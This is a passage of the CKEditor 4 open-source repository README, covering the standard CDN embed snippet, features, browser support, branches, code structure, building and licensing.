    <p\>This is the editor content.</p\>
</div\>
<script src\="https://cdn.ckeditor.com/4.13.0/standard/ckeditor.js"\></script\>
<script\>
    CKEDITOR.replace( 'editor' );
</script\>

**Integrating with Angular, React and Vue.js**

Refer to official usage guides for the ckeditor4-angular, ckeditor4-react and ckeditor4-vue packages.

**Manual download**

Visit the CKEditor 4 download section on the CKEditor website to download ready-to-use CKEditor 4 packages or to create a customized CKEditor 4 build.

**Features**

*   Over 500 plugins in the Add-ons Repository.
*   Pasting from Microsoft Word, Excel and Google Docs.
*   Drag&drop image uploads.
*   Media embeds to insert videos, tweets, maps, slideshows.
*   Powerful clipboard integration.
*   Content quality control with Advanced Content Filter.
*   Extensible widget system.
*   Custom table selection.
*   Accessibility conforming to WCAG and Section 508.
*   Over 70 localizations available with full RTL support.

**Browser support**

  
IE / Edge

  
Firefox

  
Chrome

  
Chrome (Android)

  
Safari

  
iOS Safari

  
Opera

IE8, IE9, IE10, IE11, Edge

latest version

latest version

latest version

latest version

latest version

latest version

Find out more in the Browser Compatibility guide.

**Working with the ckeditor4 repository**

**Attention**: The code in this repository should be used locally and for development purposes only. We do not recommend using it in a production environment because the user experience will be very limited.

**Code installation**

There is no special installation procedure to install the development code. Simply clone it to any local directory and you are set.

**Available branches**

This repository contains the following branches:

*   **master** – Development of the upcoming minor release.
*   **stable** – Latest stable release tag point (non-beta).
*   **latest** – Latest release tag point (including betas).
*   **release/A.B.x** (e.g. 4.0.x, 4.1.x) – Release freeze, tests and tagging. Hotfixing.

Note that the master branch is under heavy development. Its code did not pass the release testing phase, though, so it may be unstable.

Additionally, all releases have their respective tags in the following form: 4.4.0, 4.4.1, etc.

**Samples**

The samples/ folder contains some examples that can be used to test your installation. Visit CKEditor 4 Examples for plenty of samples showcasing numerous editor features, with source code readily available to view, copy and use in your own solution.

**Code structure**

The development code contains the following main elements:

*   Main coding folders:
    *   core/ – The core API of CKEditor 4. Alone, it does nothing, but it provides the entire JavaScript API that makes the magic happen.
    *   plugins/ – Contains most of the plugins maintained by the CKEditor 4 core team.
    *   skin/ – Contains the official default skin of CKEditor 4.
    *   dev/ – Contains some developer tools.
    *   tests/ – Contains the CKEditor 4 tests suite.

**Building a release**

A release-optimized version of the development code can be easily created locally. The dev/builder/build.sh script can be used for that purpose:

A "release-ready" working copy of your development code will be built in the new dev/builder/release/ folder. An Internet connection is necessary to run the builder, for the first time at least.

**Testing environment**

Read more on how to set up the environment and execute tests in the CKEditor 4 Testing Environment guide.

**Reporting issues**

Use the CKEditor 4 GitHub issue page to report bugs and feature requests.

**License**

Copyright (c) 2003-2022, CKSource Holding sp. z o.o. All rights reserved.

For licensing, see LICENSE.md or https://ckeditor.com/legal/ckeditor-oss-license

Tag

#google